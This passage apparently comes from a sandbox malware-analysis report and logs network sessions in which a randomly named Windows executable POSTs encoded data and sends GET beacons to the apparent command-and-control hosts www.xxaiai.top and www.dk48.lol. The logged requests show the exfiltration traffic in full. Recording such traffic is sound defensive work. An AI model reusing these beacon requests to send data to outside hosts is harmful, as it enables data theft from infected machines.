                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 31 4e 36 6b 65 32 69 63 53 79 35 71 51 6a 69 62 76 49 50 36 64 78 45 64 71 6e 6e 69 43 52 75 51 53 44 74 4f 2f 6a 70 37 68 4d 76 4d 33 64 34 32 6d 52 4a 6a 50 79 6b 45 30 77 72 35 4c 56 55 68 64 51 31 46 32 44 4e 45 34 4b 65 31 75 39 78 57 53 78 52 70 75 4a 52 72 72 2f 37 32 59 44 41 30 66 68 36 61 74 53 45 72 6c 72 6c 34 6e 65 39 55 79 71 77 32 50 48 33 55 62 35 35 6f 2f 68 65 43 6c 71 67 6e 41 36 49 39 61 57 51 6d 76 72 7a 63 57 33 34 70 37 54 2b 38 72 6e 4e 6c 44 53 75 47 4b 4b 75 51 38 6d 6a 49 67 46 41 52 62 78 48 4c 6d 78 4e 72 38 7a 51 56 32 7a 63 45 4b 39 46 70 51 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qQjibvIP6dxEdqnniCRuQSDtO/jp7hMvM3d42mRJjPykE0wr5LVUhdQ1F2DNE4Ke1u9xWSxRpuJRrr/72YDA0fh6atSErlrl4ne9Uyqw2PH3Ub55o/heClqgnA6I9aWQmvrzcW34p7T+8rnNlDSuGKKuQ8mjIgFARbxHLmxNr8zQV2zcEK9FpQA==
                                                                                                    May 2, 2024 08:26:53.014981031 CEST240INHTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:52 GMT
                                                                                                    Connection: close
                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                    Data Ascii: a
                                                                                                    May 2, 2024 08:26:53.015005112 CEST484INData Raw: 31 64 64 0d 0a a5 52 cf 8b d4 30 14 be cf 5f 11 72 69 0b 4e a2 78 71 76 a6 73 58 f1 ba 78 d8 9b 78 48 d3 4c 9b 35 6d 62 f2 3a 9d 19 d9 a3 a0 78 f0 c7 c9 05 41 3c 08 0a 0a 2e 28 8a 7b f0 af e9 2c 7b f2 5f 30 9d d6 dd 59 d1 93 81 a4 4d f2 be ef 7d
                                                                                                    Data Ascii: 1ddR0_riNxqvsXxxHL5mb:xA<.({,{_0YM}{ycCPq`v(6$,40M5QJKy9~y'W5?4OyBCm_yo<piFh+fxW0^ uF
                                                                                                    May 2, 2024 08:26:53.015033007 CEST13INData Raw: 38 0d 0a b6 41 da fe 29 03 00 00 0d 0a
                                                                                                    Data Ascii: 8A)
                                                                                                    May 2, 2024 08:26:53.015047073 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0
                                                                                                    May 2, 2024 08:26:53.557292938 CEST18INData Raw: 38 0d 0a b6 41 da fe 29 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 8A)0
                                                                                                    May 2, 2024 08:26:53.978221893 CEST18INData Raw: 38 0d 0a b6 41 da fe 29 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 8A)0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.449767108.186.8.15880916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:56.266796112 CEST713OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 31 4e 36 6b 65 32 69 63 53 79 35 71 52 44 79 62 74 76 62 36 62 52 45 65 6c 48 6e 69 4e 78 75 55 53 44 78 4f 2f 6d 52 72 68 2f 4c 4d 30 2f 51 32 6e 51 4a 6a 4d 79 6b 45 2b 51 72 38 56 6c 55 71 64 51 6f 79 32 47 4e 45 34 4b 4b 31 75 35 31 57 54 43 35 71 75 5a 52 74 6e 66 37 4f 47 7a 41 30 66 68 36 61 74 54 30 52 6c 74 4e 34 6d 75 74 55 7a 50 63 78 48 6e 33 4c 63 35 35 6f 37 68 66 4c 6c 71 67 56 41 34 38 54 61 56 6f 6d 76 70 72 63 52 6d 34 6d 79 54 2b 41 30 33 4e 36 43 79 61 4f 4c 37 6e 6d 69 6e 43 6e 70 6d 67 77 58 58 57 52 33 41 73 38 75 7a 30 6d 72 30 56 77 48 2b 34 67 4c 4d 63 70 48 6b 66 76 65 48 76 75 7a 6c 41 2b 6f 2b 35 70 58 6d 49 3d
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qRDybtvb6bREelHniNxuUSDxO/mRrh/LM0/Q2nQJjMykE+Qr8VlUqdQoy2GNE4KK1u51WTC5quZRtnf7OGzA0fh6atT0RltN4mutUzPcxHn3Lc55o7hfLlqgVA48TaVomvprcRm4myT+A03N6CyaOL7nminCnpmgwXXWR3As8uz0mr0VwH+4gLMcpHkfveHvuzlA+o+5pXmI=
                                                                                                    May 2, 2024 08:26:56.423480988 CEST240INHTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:55 GMT
                                                                                                    Connection: close
                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                    Data Ascii: a
                                                                                                    May 2, 2024 08:26:56.423504114 CEST484INData Raw: 31 64 64 0d 0a a5 52 cf 8b d4 30 14 be cf 5f 11 72 69 0b 4e a2 78 71 76 a6 73 58 f1 ba 78 d8 9b 78 48 d3 4c 9b 35 6d 62 f2 3a 9d 19 d9 a3 a0 78 f0 c7 c9 05 41 3c 08 0a 0a 2e 28 8a 7b f0 af e9 2c 7b f2 5f 30 9d d6 dd 59 d1 93 81 a4 4d f2 be ef 7d
                                                                                                    Data Ascii: 1ddR0_riNxqvsXxxHL5mb:xA<.({,{_0YM}{ycCPq`v(6$,40M5QJKy9~y'W5?4OyBCm_yo<piFh+fxW0^ uF
                                                                                                    May 2, 2024 08:26:56.423552036 CEST13INData Raw: 38 0d 0a b6 41 da fe 29 03 00 00 0d 0a
                                                                                                    Data Ascii: 8A)
                                                                                                    May 2, 2024 08:26:56.423635006 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    31192.168.2.449768108.186.8.15880916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:58.956283092 CEST10795OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 31 4e 36 6b 65 32 69 63 53 79 35 71 52 44 79 62 74 76 62 36 62 52 45 65 6c 48 6e 69 4e 78 75 55 53 44 78 4f 2f 6d 52 72 68 2f 44 4d 30 4d 6f 32 6d 33 6c 6a 4e 79 6b 45 67 41 72 39 56 6c 55 4e 64 51 77 32 32 47 4a 36 34 49 79 31 76 63 68 57 44 6a 35 71 39 35 52 74 76 2f 37 31 59 44 41 68 66 68 4b 65 74 53 49 52 6c 74 4e 34 6d 73 46 55 30 61 77 78 46 6e 33 55 62 35 35 30 2f 68 66 6a 6c 71 35 69 41 34 35 6d 61 6c 49 6d 76 4a 37 63 51 51 4d 6d 7a 7a 2b 47 33 33 4d 76 43 79 48 51 4c 2f 50 51 69 6e 33 36 70 68 51 77 55 68 66 48 7a 46 4e 72 37 79 4d 64 37 6c 31 75 49 65 55 38 45 38 30 52 58 32 37 34 4a 58 37 47 2f 44 56 76 39 50 52 5a 56 54 34 70 4e 56 70 58 52 6a 56 31 67 75 4c 64 32 64 42 6c 6d 75 50 53 50 2b 71 55 39 57 65 72 4c 45 55 74 72 62 2f 4b 54 4b 4c 52 42 55 74 39 41 30 4b 35 62 67 58 43 4f 6b 37 63 4a 69 4d 5a 59 46 50 34 33 38 73 61 76 4f 33 63 79 74 4d 63 33 75 7a 54 72 38 65 73 2b 45 77 33 32 51 69 67 56 50 6c 32 37 4f 44 57 44 61 57 31 4c 55 52 79 4c 58 78 48 31 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qRDybtvb6bREelHniNxuUSDxO/mRrh/DM0Mo2m3ljNykEgAr9VlUNdQw22GJ64Iy1vchWDj5q95Rtv/71YDAhfhKetSIRltN4msFU0awxFn3Ub550/hfjlq5iA45malImvJ7cQQMmzz+G33MvCyHQL/PQin36phQwUhfHzFNr7yMd7l1uIeU8E80RX274JX7G/DVv9PRZVT4pNVpXRjV1guLd2dBlmuPSP+qU9WerLEUtrb/KTKLRBUt9A0K5bgXCOk7cJiMZYFP438savO3cytMc3uzTr8es+Ew32QigVPl27ODWDaW1LURyLXxH1Jnb7Kal44UI6e69yFt8zAgLccrkV3truWLOzphVNlrbSeCroHwWIFLaGElUWpYejNQy3LQQzbG9jTrIc7g+T2HU2PkozzsEuYjDo7at1UFsUUqIzmn6xppmiNn7bIYJbsK6UsdwgeaKN3PJ9ycXYgs/3Tq8s1tixwN4fPO9r86CV/QWczIhVzhd4eaKbn3ZW8Twl/L8ec5EmT77jhpMInuRAAZil9Ax7nqtiSJR6IVhJlpDTyY/z95DPf8JtzAI/8+ppTMNX0395XJCMs6iiE4tJUkqr6pqrPXV+xidPwxVktbfDa1qKzMC12l+sLPygn3sq5XckJr9syvxtHgdj3MzFLaYhiNDwxqUB9QyncBHembDbXweyAYttxlc/5Qr+QMcZUk7syGeBmYrcW8JgCwmE4VwKKJZyuInRZd5Czfeers3mudqV1yCeo1Kc6H4VFzEWrDr6hDoFexpVygicQunlA+Nzb5NCu9PAkhtQ8ZtflNsQeFsUudwVsxXeOTx3rcNRrw4uemx7gFGDNTFNOodYhXkqe7RAU7lNhip1JuBe+258MN84WAbVn3q8dRtioY6Lqu+PpvZtZDHn6vdM4O+hoL/2d2vaAnzKRpFWT9KaTr6HSGaZbP2E8sgH2zcX1BjDXPrZB0x9DRx8TIT0LSNBjKMtEKOSKN [TRUNCATED]
                                                                                                    May 2, 2024 08:26:59.111953974 CEST240INHTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Encoding: gzip
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:26:58 GMT
                                                                                                    Connection: close
                                                                                                    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                                                                                    Data Ascii: a
                                                                                                    May 2, 2024 08:26:59.111979961 CEST484INData Raw: 31 64 64 0d 0a a5 52 cf 8b d4 30 14 be cf 5f 11 72 69 0b 4e a2 78 71 76 a6 73 58 f1 ba 78 d8 9b 78 48 d3 4c 9b 35 6d 62 f2 3a 9d 19 d9 a3 a0 78 f0 c7 c9 05 41 3c 08 0a 0a 2e 28 8a 7b f0 af e9 2c 7b f2 5f 30 9d d6 dd 59 d1 93 81 a4 4d f2 be ef 7d
                                                                                                    Data Ascii: 1ddR0_riNxqvsXxxHL5mb:xA<.({,{_0YM}{ycCPq`v(6$,40M5QJKy9~y'W5?4OyBCm_yo<piFh+fxW0^ uF
                                                                                                    May 2, 2024 08:26:59.111990929 CEST13INData Raw: 38 0d 0a b6 41 da fe 29 03 00 00 0d 0a
                                                                                                    Data Ascii: 8A)
                                                                                                    May 2, 2024 08:26:59.112004995 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    32192.168.2.449769108.186.8.15880916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:01.647504091 CEST434OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:01.803841114 CEST209INHTTP/1.1 200 OK
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                    X-Powered-By: Nginx
                                                                                                    Date: Thu, 02 May 2024 06:27:01 GMT
                                                                                                    Connection: close
                                                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                    Data Ascii: 3
                                                                                                    May 2, 2024 08:27:01.803896904 CEST813INData Raw: 33 32 36 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 e6 b5
                                                                                                    Data Ascii: 326<html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script>(function(){ var bp = d
                                                                                                    May 2, 2024 08:27:01.803911924 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    33192.168.2.44977091.195.240.1980916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:16.299103022 CEST687OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 41 72 66 50 70 72 54 39 4b 61 2f 52 42 71 70 7a 6c 59 73 31 4e 4f 51 72 2b 4b 47 4d 5a 53 30 6a 75 41 33 77 4f 55 6e 6f 71 65 75 72 78 6f 44 4d 71 52 4e 66 33 5a 63 75 64 44 62 78 31 6d 53 38 4c 46 30 62 73 39 45 61 4b 4a 68 6e 61 69 45 66 78 49 50 48 56 45 4a 64 5a 53 36 69 4e 56 68 33 68 33 46 70 75 76 56 44 54 43 50 78 30 6e 2f 31 4d 69 35 6b 47 63 42 67 74 7a 4f 6b 6e 34 64 31 78 2f 39 64 6a 77 5a 6f 6c 6d 69 6b 42 7a 63 48 2b 34 72 4f 59 47 68 56 71 68 2f 45 39 31 65 65 56 30 45 66 78 63 31 47 5a 42 48 6a 2f 38 43 6f 44 37 47 6f 61 68 39 48 59 41 59 77 7a 51 66 69 5a 77 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=ArfPprT9Ka/RBqpzlYs1NOQr+KGMZS0juA3wOUnoqeurxoDMqRNf3ZcudDbx1mS8LF0bs9EaKJhnaiEfxIPHVEJdZS6iNVh3h3FpuvVDTCPx0n/1Mi5kGcBgtzOkn4d1x/9djwZolmikBzcH+4rOYGhVqh/E91eeV0Efxc1GZBHj/8CoD7Goah9HYAYwzQfiZw==
                                                                                                    May 2, 2024 08:27:16.474812031 CEST208INHTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    34192.168.2.44977191.195.240.1980916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:19.015899897 CEST707OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 41 72 66 50 70 72 54 39 4b 61 2f 52 62 4a 42 7a 6e 2f 77 31 4c 75 51 71 39 4b 47 4d 50 69 30 34 75 41 7a 77 4f 51 57 74 74 71 43 72 79 4e 2f 4d 72 51 4e 66 32 5a 63 75 61 7a 62 77 71 32 53 33 4c 46 78 6d 73 35 45 61 4b 4a 31 6e 61 6a 30 66 78 2f 61 52 55 55 4a 66 46 53 36 38 44 31 68 33 68 33 46 70 75 76 42 35 54 43 33 78 30 58 50 31 50 47 74 72 4c 38 42 6a 71 7a 4f 6b 6a 34 64 70 78 2f 38 77 6a 78 31 4f 6c 6a 6d 6b 42 32 67 48 2f 70 72 42 44 57 67 65 6b 42 2b 41 30 46 58 7a 56 51 63 53 77 4b 6c 6e 5a 56 43 45 36 36 54 79 53 4b 6e 2f 49 68 5a 30 46 48 52 45 2b 54 69 72 43 78 75 39 50 42 42 53 35 6c 46 30 4f 6c 48 55 55 32 78 53 38 62 55 3d
                                                                                                    Data Ascii: ABqDW6A8=ArfPprT9Ka/RbJBzn/w1LuQq9KGMPi04uAzwOQWttqCryN/MrQNf2Zcuazbwq2S3LFxms5EaKJ1naj0fx/aRUUJfFS68D1h3h3FpuvB5TC3x0XP1PGtrL8BjqzOkj4dpx/8wjx1OljmkB2gH/prBDWgekB+A0FXzVQcSwKlnZVCE66TySKn/IhZ0FHRE+TirCxu9PBBS5lF0OlHUU2xS8bU=
                                                                                                    May 2, 2024 08:27:19.191505909 CEST208INHTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    35192.168.2.44977291.195.240.1980916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:21.727560043 CEST10789OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.dk48.lol
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.dk48.lol/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 41 72 66 50 70 72 54 39 4b 61 2f 52 62 4a 42 7a 6e 2f 77 31 4c 75 51 71 39 4b 47 4d 50 69 30 34 75 41 7a 77 4f 51 57 74 74 72 57 72 78 34 7a 4d 72 7a 31 66 78 5a 63 75 5a 7a 62 31 71 32 53 51 4c 45 56 69 73 35 41 67 4b 4c 4e 6e 61 42 38 66 33 4f 61 52 4e 6b 4a 66 64 53 36 68 4e 56 68 59 68 32 31 6c 75 76 52 35 54 43 33 78 30 56 6e 31 62 69 35 72 4e 38 42 67 74 7a 4f 53 6e 34 64 56 78 2f 30 4f 6a 78 78 34 6c 51 75 6b 45 6e 51 48 39 62 44 42 50 57 67 63 6e 42 2b 6d 30 46 4c 77 56 52 31 6a 77 4b 35 42 5a 53 4b 45 33 73 79 77 48 71 37 39 53 6e 64 4b 52 67 34 67 2b 55 65 72 44 69 53 68 65 42 68 63 74 6b 78 34 47 48 65 66 51 57 41 54 72 75 73 47 55 51 36 52 4a 32 72 6c 56 5a 70 50 78 4c 63 6f 44 4a 32 4f 74 59 76 41 38 78 43 34 34 41 4c 45 61 6b 77 74 61 50 4a 52 75 33 71 4a 4c 6a 44 63 75 64 36 76 48 54 4c 61 6d 32 33 50 6c 76 33 4a 63 75 44 72 35 4a 30 56 32 54 55 50 53 42 64 46 35 7a 35 6b 30 63 51 36 36 49 6f 55 72 41 6e 5a 4a 78 50 54 78 4c 78 62 75 30 55 6d 43 51 6d 79 76 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=ArfPprT9Ka/RbJBzn/w1LuQq9KGMPi04uAzwOQWttrWrx4zMrz1fxZcuZzb1q2SQLEVis5AgKLNnaB8f3OaRNkJfdS6hNVhYh21luvR5TC3x0Vn1bi5rN8BgtzOSn4dVx/0Ojxx4lQukEnQH9bDBPWgcnB+m0FLwVR1jwK5BZSKE3sywHq79SndKRg4g+UerDiSheBhctkx4GHefQWATrusGUQ6RJ2rlVZpPxLcoDJ2OtYvA8xC44ALEakwtaPJRu3qJLjDcud6vHTLam23Plv3JcuDr5J0V2TUPSBdF5z5k0cQ66IoUrAnZJxPTxLxbu0UmCQmyv/usBIdo828A76VO8gNMjVDst9+vlFC1xtaQn6ZHN0yErCjwAdgzbz3FQYfSers1mTj5kqJTmlZ4rLkAce9mr4Mn/XARsxJehdt/4s4JDmw/GlqrvnwZeTFW9oQ4NH6tU7RE/nafda/xxDt6+WNC28xHV1QVP+5FagVEDUk3HSuwAshd9jGeonLNnOdVhjHjTyotwJoa/XDINgxoT5yRE+R6yV8nPBz7lkaQnT/+uthyGIl2dgHL7IEtdcOGd/T5Lxq0w8jy7dl3PYPT3mWKYdnik/uQ6iFwpKTN1oiJTEzR0iOoehi1NcB4OrK8c+XJh8+ZP994XhAlFTU74djGN3i1CkRJu7KL1yllvCtesFt3ElFugZGkaDS3hTqi9UFQ8FtLOfygzY7DOWhSqor75wU710d3YGgla/kQA8Gbu9fEPEz9fBofLwBByciUdVRmDKRsdRVTKp+ZUyrZuALuSZElLJIXzeNUe9mydHaVpdbDGar09S0NMXOvwwRQfrLWTCYVXkuaiVx1lSsUsb0h6EgOChKBUAtT933pnkMklXJX+tf8Z3429U1ua38DYflnaiPnamdNdpXzI0PQY/bbjNI93Ll/xABnfpaadZ3i0o0JwjJIopa6DeBbCvsGzF1Vt1J9WTUWBvBB7H5sf/SQzleNsRSKBTAUxZ6 [TRUNCATED]
                                                                                                    May 2, 2024 08:27:21.902539015 CEST208INHTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    36192.168.2.44977391.195.240.1980916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:27:25.215449095 CEST432OUTGET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1
                                                                                                    Host: www.dk48.lol
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:27:25.390367031 CEST208INHTTP/1.1 403 Forbidden
                                                                                                    content-length: 93
                                                                                                    cache-control: no-cache
                                                                                                    content-type: text/html
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
